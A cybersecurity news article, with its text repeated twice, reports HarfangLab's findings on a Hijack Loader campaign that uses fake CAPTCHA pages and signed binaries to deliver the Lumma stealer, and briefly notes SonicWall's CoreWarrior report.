A new wave of attacks uses Windows system utilities to bypass protection.
Researchers from the French company HarfangLab have discovered a new malicious campaign spreading the Hijack Loader malware using legitimate digital signature certificates. Malicious activity was recorded in early October, while the goal of the attack was to install a data-stealing program called Lumma.
Hijack Loader, also known as DOILoader and SHADOWLADDER, first came to prominence in September 2023. It is distributed through the download of fake files under the guise of pirated software or movies. The new versions of the attacks direct users to fake CAPTCHA pages that prompt them to enter and run a malicious PowerShell command that downloads the infected archive.
HarfangLab has observed three variations of the malicious PowerShell script since mid-September of this year. Among them are scripts that use «mshta.exe" and "msiexec.exe" to execute code and download malicious data from remote servers.
The archive that victims download contains both a legitimate executable file and a malicious DLL that loads Hijack Loader. The malicious file decrypts and executes encoded data designed to download and run an infostealer.
Since October 2024, attackers have started using signed binaries instead of DLLs to avoid detection by antivirus programs. While it is unclear whether all of the certificates were stolen, experts believe that some of them may have been generated by the attackers. Reportedly, the certificates used to sign the malware have already been revoked.
SonicWall has also recently reported an increase in attacks aimed at infecting Windows, but this time with the help of the CoreWarrior malware, a Trojan that spreads rapidly, creating many copies of itself and creating backdoors for remote access.
The use of legitimate digital signatures to distribute malware shows that even conventional methods of protection can become an effective tool in the hands of cybercriminals. This highlights the importance of constantly improving cybersecurity and being alert to any suspicious activity, even if it seems safe at first glance.
Source
Researchers from the French company HarfangLab have discovered a new malicious campaign spreading the Hijack Loader malware using legitimate digital signature certificates. Malicious activity was recorded in early October, while the goal of the attack was to install a data-stealing program called Lumma.
Hijack Loader, also known as DOILoader and SHADOWLADDER, first came to prominence in September 2023. It is distributed through the download of fake files under the guise of pirated software or movies. The new versions of the attacks direct users to fake CAPTCHA pages that prompt them to enter and run a malicious PowerShell command that downloads the infected archive.
HarfangLab has observed three variations of the malicious PowerShell script since mid-September of this year. Among them are scripts that use «mshta.exe" and "msiexec.exe" to execute code and download malicious data from remote servers.
The archive that victims download contains both a legitimate executable file and a malicious DLL that loads Hijack Loader. The malicious file decrypts and executes encoded data designed to download and run an infostealer.
Since October 2024, attackers have started using signed binaries instead of DLLs to avoid detection by antivirus programs. While it is unclear whether all of the certificates were stolen, experts believe that some of them may have been generated by the attackers. Reportedly, the certificates used to sign the malware have already been revoked.
SonicWall has also recently reported an increase in attacks aimed at infecting Windows, but this time with the help of the CoreWarrior malware, a Trojan that spreads rapidly, creating many copies of itself and creating backdoors for remote access.
The use of legitimate digital signatures to distribute malware shows that even conventional methods of protection can become an effective tool in the hands of cybercriminals. This highlights the importance of constantly improving cybersecurity and being alert to any suspicious activity, even if it seems safe at first glance.
Source
